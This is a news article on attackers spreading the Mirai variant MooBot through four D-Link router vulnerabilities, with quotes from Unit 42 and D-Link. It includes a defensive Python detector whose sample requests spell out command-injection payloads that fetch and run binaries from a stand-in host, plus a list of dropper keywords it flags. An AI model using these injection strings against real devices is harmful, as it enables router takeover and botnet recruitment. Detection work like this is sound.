Dive Brief:
- Threat actors are exploiting vulnerabilities in D-Link routers to spread a variant of Mirai malware called MooBot, which targets exposed networking devices running Linux, according to research released Tuesday from Palo Alto Networks' Unit 42.
- Though the manufacturer has published security bulletins for the vulnerabilities, many users are still running older devices or unpatched firmware, according to the report.
- The report cites four known vulnerabilities exploited in the attacks. After a successful exploit, the injected command uses the wget utility to download MooBot samples onto the device.
Dive Insight:
MooBot was originally discovered in September 2019 by security firm Qihoo 360. Threat actors spread MooBot by abusing default credentials on exposed devices and by exploiting n-day or zero-day vulnerabilities, according to researchers.
“Once MooBot starts executing on the compromised devices, attackers can add the compromised devices to their botnet and launch DDoS attacks for different purposes,” Zhibin Zhang, senior principal researcher at Palo Alto Networks, said.
The vulnerabilities include the following:
- CVE-2015-2051 D-Link HNAP SOAPAction Header Command Execution Vulnerability
- CVE-2018-6530 D-Link SOAP Interface Remote Code Execution Vulnerability
- CVE-2022-26258 D-Link Remote Code Execution Vulnerability
- CVE-2022-28958 D-Link Remote Code Execution Vulnerability
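As an added illustration (not from the Unit 42 report or from this article), the Python below flags HTTP requests matching the two patterns described above: command injection through the HNAP SOAPAction header, which is how CVE-2015-2051 is triggered, and a download-and-execute payload built around wget. The sample requests, the 198.51.100.7 host and the x.mips/x.arm file names are constructed for this example; the curl and tftp tokens generalize beyond the wget behaviour the report describes.

```python
"""Flag HTTP requests that look like router-exploitation attempts:
command injection via the HNAP SOAPAction header (the CVE-2015-2051
pattern) and Mirai-style download-and-execute payloads.

All sample requests below are constructed for this example; they are not
captured traffic and do not reproduce payloads from the Unit 42 report.
"""
import re
from urllib.parse import unquote

# A benign HNAP SOAPAction is "http://purenetworks.com/HNAP1/<ActionName>",
# where <ActionName> is plain alphanumerics (e.g. GetDeviceSettings).
# Shell metacharacters after the action name are injection.
SHELL_META_RE = re.compile(r"[`;|&]|\$\(")

# Dropper vocabulary: fetch a binary, make it executable, run it from /tmp.
# Requiring two or more tokens keeps false positives down. curl/tftp are a
# generalization; the report itself describes wget.
DROPPER_TOKENS = ("wget ", "curl ", "tftp ", "chmod ", "/tmp", "busybox")


def http(lines, body=""):
    """Assemble a raw HTTP/1.1 request from request line and header lines."""
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Constructed sample traffic (hypothetical host 198.51.100.7, a documentation address).
SAMPLE_REQUESTS = [
    http(["POST /HNAP1/ HTTP/1.1", "Host: 192.168.0.1",
          'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"',
          "Content-Type: text/xml; charset=utf-8"], "<soap:Envelope/>"),
    http(["POST /HNAP1/ HTTP/1.1", "Host: 192.168.0.1",
          'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
          '`cd /tmp; wget http://198.51.100.7/x.mips; chmod 777 x.mips; ./x.mips`"']),
    http(["GET /index.html HTTP/1.1", "Host: 192.168.0.1", "User-Agent: Mozilla/5.0"]),
    http(["GET /cgi-bin/ping.cgi?host=127.0.0.1%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F"
          "198.51.100.7%2Fx.arm%3Bchmod%20%2Bx%20x.arm%3B.%2Fx.arm HTTP/1.1",
          "Host: 192.168.0.1"]),
]


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # only the first colon separates name/value
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def check_soapaction(value):
    """Return a finding for an HNAP SOAPAction header, or None if it looks benign."""
    if "HNAP1/" not in value:
        return None  # not an HNAP request
    action = value.split("HNAP1/", 1)[1].strip('"')
    if re.fullmatch(r"[A-Za-z0-9_]+", action):
        return None  # e.g. GetDeviceSettings
    if SHELL_META_RE.search(action):
        return "hnap-soapaction-command-injection"
    return "hnap-soapaction-unexpected-action"


def analyze_request(raw):
    """Return a list of finding strings for one request (empty means clean)."""
    _, path, headers, body = parse_request(raw)
    findings = []
    if "soapaction" in headers:
        finding = check_soapaction(headers["soapaction"])
        if finding:
            findings.append(finding)
    # Look for dropper vocabulary in the decoded URL, header values and body.
    blob = " ".join([unquote(path), *headers.values(), unquote(body)])
    hits = [t for t in DROPPER_TOKENS if t in blob]
    if len(hits) >= 2:
        findings.append("dropper-commands:" + ",".join(h.strip() for h in hits))
    return findings


def scan(requests):
    """Map request index to findings; clean requests are omitted."""
    results = {}
    for i, raw in enumerate(requests):
        findings = analyze_request(raw)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_REQUESTS).items():
        print(f"request {idx}: {', '.join(findings)}")
```

The SOAPAction check is deliberately narrow (anything but an alphanumeric action name), because the legitimate header space is tiny; the dropper check is broad but needs two tokens, so a lone "/tmp" in a normal request does not fire.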
Researchers from Palo Alto Networks Unit 42 first observed the activity in August. The targeted D-Link models are home routers designed for consumers, but with many corporate employees still working remotely, the same devices now carry work traffic.
William Brown, senior vice president of operations and CISO at D-Link, said nearly all the products involved reached end-of-life (EOL) or end-of-service (EOS) about four years ago. Brown said the devices should be retired and replaced.
“We didn’t know about it, even though we are scanning the net all the time,” Brown said via email.
Brown said the researchers may have noticed the vulnerabilities because the affected devices are no longer supported, having reached end-of-life status.
Asked whether researchers had reached out to the company, Jen Miller Osborn, deputy director of threat intelligence at Unit 42, said that once a proof of concept is public, attackers are known to begin exploiting it within 24 hours.
“Typical responsible disclosure focuses on 90 days – some of the vulnerabilities in our blog date back to 2015,” Osborn noted via email.
Osborn said that at this point the onus is on users to apply patches, and the researchers strongly recommend applying upgrades and patches where possible. Brown said the company will follow up with the researchers.
D-Link issued a bulletin on Wednesday with information about the security issue after Cybersecurity Dive reached out to request a comment on the report. Brown said the company’s direct-to-consumer channel will typically offer a low-cost upgrade for such devices.